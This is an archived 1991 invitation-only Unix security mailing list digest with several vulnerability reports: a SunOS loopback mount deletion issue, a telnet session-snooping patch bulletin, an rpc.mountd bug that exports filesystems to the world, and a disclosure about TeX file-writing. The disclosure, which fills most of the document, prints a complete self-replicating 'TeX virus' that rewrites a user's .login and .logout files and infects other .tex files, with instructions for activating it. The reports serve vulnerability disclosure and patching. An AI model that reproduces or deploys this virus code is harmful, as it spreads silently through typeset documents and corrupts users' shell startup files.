The 'Security Digest' Archives (TM)

Archive: About | Browse | Search | Contributions | Feedback
Site: Help | Index | Search | Contact | Notices | Changes

ARCHIVE: Core 'Security Digest' - Archives (1990 - 1991)
DOCUMENT: Core 'Security Digest' V1 #15 1991-04-01 (1 file, 6018 bytes)
SOURCE: http://securitydigest.org/exec/display?f=core/archive/115.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT


Date: Mon Apr 1 13:31:09 PST 1991
Subject: Core Security Digest V1 #15

Core Security Digest Volume 1 Issue 15

subject(s):

            Sun: lofs security problem
            Early notice Sun Security Bulletin
            Re: Security problem with Sun OS rpc.mountd -- and a fix
            TeX security flaw [Zbigniew Fiedorowicz: TeX security flaw]

The unix core security mailing list is by invitation only and contains
sensitive material which SHOULD NOT BE REVEALED to non-members.
DO NOT PUT ANY LIST CONTENTS IN LOCATIONS ACCESSABLE TO NON-MEMBERS.
If you must keep copies on-line, please encrypt them at the very least.

PLEASE POST TO:                              core@uninet.cpd.com
PLEASE SEND EMERGENCY ALERTS TO:   core-emergency@uninet.cpd.com
PLEASE SEND REQUESTS TO:             core-request@uninet.cpd.com


------------------------------------------------------------------------

Date: Thu, 07 Mar 91 20:02:53 -0800
From: shipley@remarque.berkeley.edu
Subject: Sun: lofs security problem

This info is incompleat so if anyone has more (or can verify details)
please send me mail.

under SunOS 4.1 ( and 4.1.1 )

Root can delete files on files systems mounted readonly via. the
loopback filesystem.

To repeat: [From memory]

as a non-priv user:
    % whoami
    shipley

    % mkdir /tmp/tester
    % cp /etc/motd /tmp/tester/file
    % su
    # mkdir /tmp/test
    # mount -t lo -o ro /tmp/tester /tmp/test
    # suspend
    % ls -l /tmp/test/file
    -rw-rw-rw-  1 shipley           23 Jun  4  1990 /tmp/test/file
    % rm /tmp/test/file
    rm: read-only file system
    % fg
    # rm /tmp/test/file
    # ls -l /tmp/test/file
    /tmp/test/file not found
    # exit
    % logout

------------------------------------------------------------------------

Date: Mon, 25 Mar 91 10:45:05 PST
From: bradpowell@Corp.Sun.COM (Brad Powell )
Subject: Early notice Sun Security Bulletin

This is an early warning about a Sun Security Bulletin that will be going out shortly.

Brad Powell
Sun Microsystems
Software Security Coordinator.

SUN MICROSYSTEMS SECURITY BULLETIN:

 This information is only to be used for the purpose of alerting
customers to problems. Any other use or re-broadcast of this
information without the express written consent of Sun Microsystems
shall be prohibited.

Sun expressly disclaims all liability for any misuse of this information
by any third party.

   All of these patches are available through your local Sun answer centers
   worldwide.
   As well as through anonymous ftp to ftp.uu.net in the US on ~ftp/sun-dist
   directory and In Europe on mcsun on ~ftp/sun/fixes directory.

Please refer to the BugID and PatchID when requesting patches from Sun
answer centers.

NO README information will be posted in the patch on UUNET. Please refer
the the information below for patch installation instructions.

Sun Bug ID  : 1054669 1050269 1049886 1042370 1040722 1033809
Synopsis    : SunOS 4.1, 4.1.1 :after telnet session aborts, new session gets
              previous output
Sun Patch ID: 100125-02
Checksum of compressed tarfile 1001125-02.tar.Z =  44522    46

Patch-ID# 100125-02
Keywords:  telnet, previous sessions output, security
Synopsis: SunOS 4.1, 4.1.1 :after telnet session aborts, new session gets pervious output
Date: 21/Mar/91

SunOS release: 4.1, 4.1.1

Unbundled Product:

Unbundled Release:

Topic:

BugId's fixed with this patch: 1054669 1050269 1049886 1042370 1040722 1033809

Architectures for which this patch is available: all sun3, sun4

Patches which may conflict with this patch:

Obsoleted by: SYS_V Rel 4

Problem Description:

1)
       A program was shown to take advantage of telnet in a manner that
       allowed passwords and login strings to be snooped when a user logged
       in using telnet.

2)     When a user telnets into another host and starts running a command that
       outputs to the terminal in the background; then terminates the telnet session,
       then starts a new telnet session to the same system the new telnet session
       will get output from the previous session.

INSTALL:

  # mv /usr/etc/in.telnetd /usr/etc/in.telnetd.FCS
  # chmod 600 /usr/etc/in.telnetd.FCS (as a precaution, after verifying the new version,
                                       the old version should be removed)
  # cp sun{3,3x,4,4c}/in.telnetd /usr/etc/in.telnetd
  # chmod 755 /usr/etc/in.telnetd
  # chown root /usr/etc/in.telnetd
  # chgrp staff /usr/etc/in.telnetd

 kill any existing in.telnetd that is running.

------------------------------------------------------------------------

Date: Mon, 1 Apr 91 13:01:04 PST
From: neil (Neil Gorsuch)
Subject: Re: Security problem with Sun OS rpc.mountd -- and a fix

[ This was recently posted in alt.sys.sun by dlg@riacs.edu - Neil ]

One my colleagues has recently uncovered the following security problem with
Sun OS rpc.mountd.  This problem appears to exist with all versions newer that
4.1 and for all SMI architectures.  The problem is:

    If your server has an /etc/exports file which contains an "-access="
    string longer than 256 bytes, the file system for which this line appears
    will be exported to the world.

I do not think you need be a rocket scientist to figure out the mischief this
makes possible.

The bug is the result of a procedure in rpc.mountd returning "success" after a
failure under the above circumstances.  The bug has been reported to SMI,
whose response is (so far) that the bug had been previously reported and it is
to be fixed in the next release (SVR4).

Our local SMI tech support person prepared a fix, which has been tested on
Sun3s running SunOS 4.1 and 4.1.1, and on Sun4s running SunOS 4.1_PSR_A and
4.1.1.  This repaired rpc.mountd is available via anonymous ftp from the host
riacs.edu (128.102.16.8) in the file /pub/Sun-rpc.mountd/rpc.mountd.sun.[34].
If you run into problems let me know and I will pass the info along.  I don't
know if I am authorized to make these available, but the bug does seem like a
disaster waiting to happen for somebody.

At the same time there are two other bugs which were fixed.  The first is a
disturbing bug that caused the rpc.mountd to seg fault if the system is not
running NIS and an unathorized host request a mount of one of the server's
file.  In this case yp_get_default_domain () returns a NULL pointer which
rpc.mountd cheerfully deferences.  This bug causes the server to stop mounting
file systems or directories if it is not started by inetd.

The second bug was found during testing of the fixes.  A system administrator
testing this version of this code reported that if hosts have "-access="
strings longer than 1024 bytes any host whose name does not finish before the
1024 byte mark are not allowed mount the file system or directory.  Further
investigation showed that the 1024 limit was hardwired into exportent.c, a
libc module.  Further investigation showed that another, but inconsistant,
limit is hardwired into exportfs.  The exportfs line limit is 4096 bytes.  The
exportent limit was changed to agree with the exportfs line length limit, and
this new exportent.o is linked with rpc.mountd.

------------------------------------------------------------------------

Date: Tue, 26 Mar 91 14:45:11 EST
From: spaf@cs.purdue.edu
Subject: TeX security flaw [Zbigniew Fiedorowicz: TeX security flaw]

[ This is the full version of a message sent by Gene Spafford to
security@cpd.com.  I passed through an abbreviated message to the
larger security list.  This is also the last message in this digest
because of it's length. - neil ]

You may wish to trim the code out of this and present the warning.
Then again, you may not.  No actual incident of damage has occurred
yet from a TeX-based attack, so....

    From:    Zbigniew Fiedorowicz <fiedorow@function.mps.ohio-state.edu>

    I sent the following to tug@math.ams.com.  I thought you might be
    interested.

Please pass this on to Prof. Knuth, or whoever maintains the
official TeX source code:

I am writing to inform you about a security flaw affecting Unix implementations
of TeX (perhaps other operating systems as well).  The problem is that one
can easily imbed TeX commands in ordinary TeX files to write arbitrary text
into a user's system files, such as .login, .cshrc, .profile, .logout, etc.
When a file with such commands is typeset, they may execute silently without
the user being any the wiser.  This provides a mechanism for anything from
harmless pranks to serious vandalism.  To illustrate the problem, I enclose
below a "TeX virus".

To prevent this sort of thing, TeX should check commands of the form
   \openoutn=filename
is not something like .login, ../.logout, etc.  It would seem reasonable
to impose the condition that the only filenames acceptable to TeX must
end in the form
   x.xxx...x
where x denotes an alphanumeric character.

Enclosed below is a "demo virus" designed to spread in TeX files running
under Berkeley Unix.  Briefly here is the strategy of the virus:
  (1) It successively checks for the presence of .login in the current
      directory, its parent, grandparent and great-grandparent directory.
      If .login is not found or a viral marker file is found in the
      user's home directory, virus quits.
  (2) Otherwise it rewrites .logout and writes a few auxiliary files
      in the home directory (csh and awk scripts).
  (3) At logout, the viral code in .logout searches for the TeX source
      of the virus (marked by distinctive comments) and writes it into
      a file.  It also concatenates one of the viral csh scripts into
      the .login file.  Finally it deletes itself.
  (4) The viral code in .login maintains a targetlist of TeX files.
      Every time it runs, it picks the first tex file on the list,
      checks if it is already infected, if not infects it with the
      TeX viral source.
 It is pretty crude, but it works well enough to illustrate the
 potential problem.
 To activate the virus, copy the text below the cut line into a file
 (not more than three levels below your home directory),
 say "virus.tex", then type
    tex virus

{\obeyspaces                                 %1x2R3z
\newif\ifvstrike                                 %1x2R3z
\newif\ifnstep                                 %1x2R3z
\vstrikefalse                                 %1x2R3z
\immediate\openin7=.login                                 %1x2R3z
\ifeof7\global\nsteptrue                                 %1x2R3z
\else\global\nstepfalse                                 %1x2R3z
\closein7                                 %1x2R3z
\global\def\makevirus{.makev}                                 %1x2R3z
\global\def\awkone{.awk1}                                 %1x2R3z
\global\def\awktwo{.awk2}                                 %1x2R3z
\global\def\logout{.logout}                                 %1x2R3z
\global\def\createtl{.createtargetlist}                                 %1x2R3z
\global\def\logappend{.loginappend}                                 %1x2R3z
\global\def\vmarkf{.marker}                                 %1x2R3z
\global\def\infectone{.infect1}                                 %1x2R3z
\global\def\infectall{.infectall}                                 %1x2R3z
\immediate\openin7=\vmarkf                                 %1x2R3z
\ifeof7\global\vstriketrue\else\closein7\fi                                 %1x
2R3z
\fi                                 %1x2R3z
\ifnstep                                 %1x2R3z
\immediate\openin7=../.login                                 %1x2R3z
\ifeof7\global\nsteptrue                                 %1x2R3z
\else\global\nstepfalse                                 %1x2R3z
\closein7                                 %1x2R3z
\global\def\makevirus{../.makev}                                 %1x2R3z
\global\def\awkone{../.awk1}                                 %1x2R3z
\global\def\awktwo{../.awk2}                                 %1x2R3z
\global\def\logout{../.logout}                                 %1x2R3z
\global\def\createtl{../.createtargetlist}                                 %1x2
R3z
\global\def\logappend{../.loginappend}                                 %1x2R3z
\global\def\vmarkf{../.marker}                                 %1x2R3z
\global\def\infectone{../.infect1}                                 %1x2R3z
\global\def\infectall{../.infectall}                                 %1x2R3z
\immediate\openin7=\vmarkf                                 %1x2R3z
\ifeof7\global\vstriketrue\else\closein7\fi                                 %1x
2R3z
\fi                                 %1x2R3z
\fi                                 %1x2R3z
\ifnstep                                 %1x2R3z
\immediate\openin7=../../.login                                 %1x2R3z
\ifeof7\global\nsteptrue                                 %1x2R3z
\else\global\nstepfalse                                 %1x2R3z
\closein7                                 %1x2R3z
\global\def\makevirus{../../.makev}                                 %1x2R3z
\global\def\awkone{../../.awk1}                                 %1x2R3z
\global\def\awktwo{../../.awk2}                                 %1x2R3z
\global\def\logout{../../.logout}                                 %1x2R3z
\global\def\createtl{../../.createtargetlist}                                 %
1x2R3z
\global\def\logappend{../../.loginappend}                                 %1x2R
3z
\global\def\vmarkf{../../.marker}                                 %1x2R3z
\global\def\infectone{../../.infect1}                                 %1x2R3z
\global\def\infectall{../../.infectall}                                 %1x2R3z
\immediate\openin7=\vmarkf                                 %1x2R3z
\ifeof7\global\vstriketrue\else\closein7\fi                                 %1x
2R3z
\fi                                 %1x2R3z
\fi                                 %1x2R3z
\ifnstep                                 %1x2R3z
\immediate\openin7=../../../.login                                 %1x2R3z
\ifeof7\global\nsteptrue                                 %1x2R3z
\else\global\nstepfalse                                 %1x2R3z
\closein7                                 %1x2R3z
\global\def\makevirus{../../../.makev}                                 %1x2R3z
\global\def\awkone{../../../.awk1}                                 %1x2R3z
\global\def\awktwo{../../../.awk2}                                 %1x2R3z
\global\def\logout{../../../.logout}                                 %1x2R3z
\global\def\createtl{../../../.createtargetlist}
  %1x2R3z
\global\def\logappend{../../../.loginappend}                                 %1
x2R3z
\global\def\vmarkf{../../../.marker}                                 %1x2R3z
\global\def\infectone{../../../.infect1}                                 %1x2R3
z
\global\def\infectall{../../../.infectall}                                 %1x2
R3z
\immediate\openin7=\vmarkf                                 %1x2R3z
\ifeof7\global\vstriketrue\else\closein7\fi                                 %1x
2R3z
\fi                                 %1x2R3z
\fi                                 %1x2R3z
\ifvstrike                                 %1x2R3z
\immediate\openout7=\makevirus                                %1x2R3z
\immediate\write7{\string#}                                %1x2R3z
\immediate\write7{set j=1}                                %1x2R3z
\immediate\write7{while ($j == 1)}                                %1x2R3z
\immediate\write7{  if (!(-e .targetlist)) exit(0)}
    %1x2R3z
\immediate\write7{  if (-z .targetlist) then}                                %1
x2R3z
\immediate\write7{    /bin/rm .targetlist}                                %1x2R
3z
\immediate\write7{    exit(0)}                                %1x2R3z
\immediate\write7{  endif}                                %1x2R3z
\immediate\write7{  unalias head}                                %1x2R3z
\immediate\write7{  set T = `head -1 .targetlist`}
   %1x2R3z
\immediate\write7{  if ($T == '') exit(0)}                                %1x2R
3z
\immediate\write7{  if (!(-e $T)) then}                                %1x2R3z
\immediate\write7{    /bin/rm .targetlist}                                %1x2R
3z
\immediate\write7{    exit(0)}                                %1x2R3z
\immediate\write7{  endif}                                %1x2R3z
\immediate\write7{  if (-e .xxtmp) then}                                %1x2R3z
\immediate\write7{   /bin/rm .xxtmp}                                %1x2R3z
\immediate\write7{   exit(0)}                                %1x2R3z
\immediate\write7{  endif}                                %1x2R3z
{\catcode`\%=11\immediate\write7{  grep '%1x2R3z$' $T >.xxtmp}}
                %1x2R3z
\immediate\write7{  set T = `wc -l .xxtmp`}                                %1x2
R3z
\immediate\write7{  if ($T[1] == 219) then}                                %1x2
R3z
\immediate\write7{    set k=1}                                %1x2R3z
\immediate\write7{    echo '' >.virus}                                %1x2R3z
\immediate\write7{    while($k < 24)}                                %1x2R3z
\immediate\write7{      \string@ k++}                                %1x2R3z
\immediate\write7{      echo '' >>.virus}                                %1x2R3
z
\immediate\write7{    end}                                %1x2R3z
\immediate\write7{    cat .xxtmp >>.virus}                                %1x2R
3z
\immediate\write7{    set j=0}                                %1x2R3z
\immediate\write7{  endif}                                %1x2R3z
\immediate\write7{  /bin/rm .xxtmp}                                %1x2R3z
\immediate\write7{  /bin/awk 'NR>1' .targetlist >.xxtmp}
         %1x2R3z
\immediate\write7{  /bin/mv .xxtmp .targetlist}
%1x2R3z
\immediate\write7{end}                                %1x2R3z
\immediate\closeout7                              %1x2R3z
{\catcode`\{=11                                 %1x2R3z
 \catcode`\}=11                                 %1x2R3z
 \catcode`\[=1                                 %1x2R3z
 \catcode`\]=2                                 %1x2R3z
\immediate\openout7=\awkone                                 %1x2R3z
\immediate\write7[BEGIN             {TEST="FALSE"}]
     %1x2R3z
\catcode`\,=0                                 %1x2R3z
,catcode`,\=11                                 %1x2R3z
,immediate,write7[/\\end$/          {TEST="TRUE"}]
    %1x2R3z
,immediate,write7[/\\end /          {TEST="TRUE"}]
    %1x2R3z
,immediate,write7[/\\enddocument$/  {TEST="TRUE"}]
    %1x2R3z
,immediate,write7[/\\enddocument /  {TEST="TRUE"}]
    %1x2R3z
,immediate,write7[TEST=="FALSE"]                                 %1x2R3z
,immediate,closeout7                                 %1x2R3z
,immediate,openout7=,awktwo                                 %1x2R3z
,immediate,write7[BEGIN             {TEST="FALSE"}]
     %1x2R3z
,immediate,write7[/\\end$/          {TEST="TRUE"}]
    %1x2R3z
,immediate,write7[/\\end /          {TEST="TRUE"}]
    %1x2R3z
,immediate,write7[/\\enddocument$/  {TEST="TRUE"}]
    %1x2R3z
,immediate,write7[/\\enddocument /  {TEST="TRUE"}]
    %1x2R3z
,immediate,write7[TEST=="TRUE"]                                 %1x2R3z
,immediate,closeout7                                 %1x2R3z
,catcode`,\=0                                 %1x2R3z
\catcode`\,=11                                 %1x2R3z
\catcode`\{=1                                 %1x2R3z
 \catcode`\}=2                                 %1x2R3z
 \catcode`\[=11                                 %1x2R3z
 \catcode`\]=11                                 %1x2R3z
}                                 %1x2R3z
\immediate\openout7=\infectone                                 %1x2R3z
\immediate\write7{if (!(-e .virus)) exit(0)}                                 %1
x2R3z
\immediate\write7{if ($\string#argv != 1) exit(0)}
    %1x2R3z
\immediate\write7{if ($1 == '') exit(0)}                                 %1x2R3
z
\immediate\write7{if (!(-e $1)) exit(0)}                                 %1x2R3
z
{\catcode`\%=11\immediate\write7{set T = `grep -c '%1x2R3z$' $1`}}
                    %1x2R3z
\immediate\write7{if ($T[1] > 0) exit(0)}                                 %1x2R
3z
\immediate\write7{set T = `wc -l $1`}                                 %1x2R3z
\immediate\write7{if ($T[1] < 50) exit(0)}                                 %1x2
R3z
\immediate\write7{if (!(-e .awk1)) exit(0)}                                 %1x
2R3z
\immediate\write7{if (!(-e .awk2)) exit(0)}                                 %1x
2R3z
\immediate\write7{if (-e .xxtmp) then}                                 %1x2R3z
\immediate\write7{   /bin/rm .xxtmp}                                 %1x2R3z
\immediate\write7{endif}                                 %1x2R3z
\immediate\write7{awk -f .awk1 $1 >.xxtmp}                                 %1x2
R3z
\immediate\write7{cat .virus >>.xxtmp}                                 %1x2R3z
\immediate\write7{awk -f .awk2 $1 >>.xxtmp}                                 %1x
2R3z
{\catcode`\,=0
 %1x2R3z
,catcode`,\=11
 %1x2R3z
,immediate,write7{echo \\endinput >>.xxtmp}                                 %1x
2R3z
,catcode`,\=0
%1x2R3z
\catcode`\,=11}
  %1x2R3z
\immediate\write7{unalias tail}                                %1x2R3z
\immediate\write7{tail -50 $1 >>.xxtmp}                                 %1x2R3z
\immediate\write7{/bin/mv .xxtmp $1}                                 %1x2R3z
\immediate\closeout7                                 %1x2R3z
\immediate\openout7=\createtl                                 %1x2R3z
\immediate\write7{if(!(-e .targetlist)) then}                                 %
1x2R3z
\immediate\write7{   /bin/ls *.tex >.targetlist}
  %1x2R3z
\immediate\write7{   /bin/ls */*.tex >>.targetlist}
     %1x2R3z
\immediate\write7{   /bin/ls */*/*.tex >>.targetlist}
       %1x2R3z
\immediate\write7{   /bin/ls */*/*/*.tex >>.targetlist}
         %1x2R3z
\immediate\write7{endif}                                 %1x2R3z
\immediate\write7{if(-z .targetlist) then}                                 %1x2
R3z
\immediate\write7{   /bin/rm .targetlist}                                 %1x2R
3z
\immediate\write7{endif}                                 %1x2R3z
\immediate\closeout7                                 %1x2R3z
\immediate\openout7=\infectall                                 %1x2R3z
\immediate\write7{if(!(-e .virus)) exit(0)}                                 %1x
2R3z
\immediate\write7{if(!(-e .targetlist)) then}                                 %
1x2R3z
\immediate\write7{  csh .createtargetlist >& /dev/null}
         %1x2R3z
\immediate\write7{endif}                                 %1x2R3z
\immediate\write7{if(!(-e .targetlist)) exit(0)}
  %1x2R3z
\immediate\write7{unalias head}                                %1x2R3z
\immediate\write7{csh .infect1 `head -1 .targetlist` >& /dev/null}
                    %1x2R3z
\immediate\write7{if (-e .xxtmp) then}                                 %1x2R3z
\immediate\write7{ /bin/rm .xxtmp}                                 %1x2R3z
\immediate\write7{endif}                                 %1x2R3z
\immediate\write7{awk 'NR>1' .targetlist >.xxtmp}
   %1x2R3z
\immediate\write7{/bin/mv .xxtmp .targetlist}                                 %
1x2R3z
\immediate\write7{if (-z .targetlist) then}                                 %1x
2R3z
\immediate\write7{  /bin/rm .targetlist}                                 %1x2R3
z
\immediate\write7{endif}                                 %1x2R3z
\immediate\closeout7                                 %1x2R3z
\immediate\openout7=\logappend                                %1x2R3z
\immediate\write7{if(!(-e .virus)) then}                                %1x2R3z
\immediate\write7{  csh .makev >& /dev/null}                                %1x
2R3z
\immediate\write7{else}                                %1x2R3z
\immediate\write7{  source .infectall}                                %1x2R3z
\immediate\write7{endif}                                %1x2R3z
\immediate\closeout7                                %1x2R3z
\immediate\openout7=\logout                                 %1x2R3z
\immediate\write7{cd}                                 %1x2R3z
\immediate\write7{csh .createtargetlist >& /dev/null}
       %1x2R3z
\immediate\write7{cat  .loginappend >> .login}
%1x2R3z
\immediate\write7{nohup csh .makev >& /dev/null &}
    %1x2R3z
\immediate\write7{set i=0}                                 %1x2R3z
\immediate\write7{while($i < 25)}                                 %1x2R3z
\immediate\write7{ echo ''}                                 %1x2R3z
\immediate\write7{ echo ''}                                 %1x2R3z
\immediate\write7{ \string@ i++}                                 %1x2R3z
\immediate\write7{end}                                 %1x2R3z
\immediate\write7{/bin/rm .logout}                                 %1x2R3z
\immediate\closeout7                                 %1x2R3z
\immediate\openout7=\vmarkf                                 %1x2R3z
\immediate\closeout7                                 %1x2R3z
\fi                                 %1x2R3z
}                                %1x2R3z
\end

------------------------------------------------------------------------

        End of Core Security Digest Volume 1 Issue 15
        **********************

END OF DOCUMENT